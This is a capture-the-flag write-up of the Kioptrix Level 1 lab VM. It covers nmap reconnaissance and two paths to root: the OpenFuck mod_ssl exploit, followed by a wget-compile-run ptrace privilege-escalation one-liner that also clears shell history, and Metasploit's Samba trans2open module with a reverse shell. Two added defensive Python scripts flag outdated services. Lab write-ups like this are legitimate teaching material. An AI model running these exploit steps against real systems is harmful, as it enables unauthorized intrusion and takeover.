Kioptrix: Level 1

Another day, another VulnHub post. Today I’m going to be writing up the first of five posts about the Kioptrix series.

You can download the VM here.

DESCRIPTION

This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

MAPPING THE TARGET

We’ll start off by finding the IP of our target:

[email protected]:~$ sudo netdiscover
Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts

11 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 660
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.104   00:0c:29:7c:3a:16      1      60  VMware, Inc.

Then I ran an nmap scan to see which ports are open:

[email protected]:~$ sudo nmap -A -p- 192.168.1.104

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-19 22:54 EST
Nmap scan report for 192.168.1.104
Host is up (0.00022s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-01-20T04:56:51+00:00; +1h01m50s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
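The scan above is mostly useful for what it says about the target's configuration, not just its version numbers: SSHv1 is enabled, SSLv2 and export-grade cipher suites are offered, and HTTP TRACE is permitted. As an added example (my own script, not part of the original write-up), here is a small triage tool that parses an nmap -A report into its open-port table and flags those legacy settings line by line. SAMPLE_SCAN is a trimmed copy of the scan output above, constructed for this script, and the RULES table is my own and only covers what this particular scan surfaced.

```python
"""Flag legacy protocol settings in an nmap -A report.

Added example for this write-up, not part of the original post.
SAMPLE_SCAN is a trimmed copy of the scan output shown above (constructed
for this script); the RULES table is my own and only covers what that
scan surfaced.
"""
import re

SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
|   100000  2            111/tcp  rpcbind
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
"""

# One entry per condition: (finding id, pattern matched against each line, remediation)
RULES = [
    ("sshv1", re.compile(r"Server supports SSHv1"),
     "SSH protocol 1 is enabled; allow protocol 2 only."),
    ("http-trace", re.compile(r"Potentially risky methods:.*\bTRACE\b"),
     "HTTP TRACE is enabled; set TraceEnable off."),
    ("sslv2", re.compile(r"SSLv2 supported"),
     "SSLv2 is enabled; disable it in the mod_ssl configuration."),
    ("export-cipher", re.compile(r"EXPORT\d+"),
     "Export-grade (40-bit) cipher suite offered; remove it from the cipher list."),
]

# Matches the open-port rows only; script output lines start with '|' and are skipped.
_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$", re.MULTILINE)


def parse_open_ports(report):
    """Return the open-port rows of an nmap report as dicts."""
    return [
        {"port": int(m.group(1)), "proto": m.group(2),
         "service": m.group(3), "version": m.group(4).strip()}
        for m in _PORT_RE.finditer(report)
    ]


def find_legacy_protocols(report):
    """Run every rule against every line; one finding per matching line."""
    findings = []
    for line in report.splitlines():
        for rule_id, pattern, advice in RULES:
            if pattern.search(line):
                findings.append({"id": rule_id, "evidence": line.strip(), "advice": advice})
    return findings


def assess(report):
    """Combine the port table and the rule findings into one result."""
    return {"open_ports": parse_open_ports(report),
            "findings": find_legacy_protocols(report)}


if __name__ == "__main__":
    result = assess(SAMPLE_SCAN)
    for p in result["open_ports"]:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<12} {p['version']}")
    print()
    for f in result["findings"]:
        print(f"[{f['id']}] {f['evidence']}\n    -> {f['advice']}")
```

Run against the sample it lists six open ports and five findings (one each for SSHv1, TRACE and SSLv2, plus one per export cipher). Feeding it a saved `nmap -oN` file instead of SAMPLE_SCAN works the same way, since the rules only look at individual lines.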

EXPLOITING

This VM is one of the older ones on the VulnHub site, so practically everything on it is out of date and we should be able to find an exploit rather easily. I couldn’t find anything usable for our purposes with SSH, so I moved on to Apache.

[email protected]:~/Desktop$ searchsploit apache mod_ssl
---------------------------------------------------------------------
 Exploit Title                                                       |  Path
---------------------------------------------------------------------
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow           | /multiple/dos/21575.txt
Apache mod_ssl 2.0.x - Remote Denial of Service                      | /linux/dos/24590.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)   | /unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)     | /unix/remote/21671.c
---------------------------------------------------------------------

OpenFuck looks perfect. I tried to get it working for a while but wasn’t having any luck until I stumbled across this blog post, which tells us the changes required for the code to compile.

[email protected]:~$ ./OpenFuck 0x6b 192.168.1.104 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--01:03:53--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--01:03:53--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @ 957.28 KB/s

01:03:54 (957.28 KB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6225
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

And there we go!

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

cat /var/mail/root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from [email protected])
 by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
 for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Since that one was so quick, I decided to try another way of gaining root. This time I tried exploiting the Samba service. First I ran enum4linux against the box to find out what version it was running:

 ======================================= 
|    OS information on 192.168.1.104    |
 ======================================= 
[+] Got OS info for 192.168.1.104 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

This confirmed that it was an extremely old version; a quick search found an exploit from 2003 that comes packaged as a Metasploit module. Perfect!
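Deciding that "2.2.1a" is too old is easy by eye, but automating it needs a version parser that orders the letter suffixes Samba used in the 2.2 line correctly (2.2.8 sorts below 2.2.8a). As an added example (my own code, not from the original write-up), here is a check that pulls the version out of the enum4linux banner above and compares it against a minimum. MIN_SAFE_VERSION is my assumption that 2.2.8a is the first release carrying the fix for the trans2open bug the Metasploit module below targets; confirm that threshold against the vendor's advisory before relying on it.

```python
"""Compare a Samba banner against a minimum acceptable version.

Added example, not part of the original write-up. SAMPLE_BANNER is the
enum4linux line shown above; MIN_SAFE_VERSION is my assumption that
2.2.8a is the first release carrying the fix for the trans2open bug.
"""
import re

SAMPLE_BANNER = ("[+] Got OS info for 192.168.1.104 from smbclient: "
                 "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]")
MIN_SAFE_VERSION = "2.2.8a"  # assumption, see module docstring

_BANNER_RE = re.compile(r"Server=\[Samba\s+([0-9][0-9A-Za-z.]*)\]")
_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)([A-Za-z]*)")


def samba_version_from_banner(line):
    """Extract '2.2.1a' from an smbclient/enum4linux banner, or None if absent."""
    m = _BANNER_RE.search(line)
    return m.group(1) if m else None


def parse_version(text):
    """'2.2.1a' -> (2, 2, 1, 'a').

    Numeric fields are padded to three entries and the letter suffix is
    kept as a fourth element, so plain tuple comparison orders
    2.2.8 < 2.2.8a < 2.2.9 and 2.2.x < 3.0.0.
    """
    m = _VERSION_RE.fullmatch(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = [int(x) for x in m.group(1).split(".")]
    nums = (nums + [0, 0, 0])[:3]
    return tuple(nums) + (m.group(2).lower(),)


def is_below_minimum(version, minimum=MIN_SAFE_VERSION):
    """True when the observed version predates the minimum acceptable one."""
    return parse_version(version) < parse_version(minimum)


def triage_banner(line):
    """Return {'version', 'outdated'} for a Samba banner, or None for anything else."""
    version = samba_version_from_banner(line)
    if version is None:
        return None
    return {"version": version, "outdated": is_below_minimum(version)}


if __name__ == "__main__":
    print(triage_banner(SAMPLE_BANNER))
```

The same comparator works for any banner that exposes a Samba version string, so it can be pointed at a file of enum4linux or nmap output from a whole subnet rather than a single host.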

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(trans2open) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf exploit(trans2open) > set LPORT 8888
LPORT => 8888
msf exploit(trans2open) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.1.28:8888 
[*] 192.168.1.104:139 - Trying return address 0xbffffdfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffcfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffbfc...
[*] 192.168.1.104:139 - Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.1.28:8888 -> 192.168.1.104:1025) at 2017-01-20 00:00:19 -0500

id 
uid=0(root) gid=0(root) groups=99(nobody)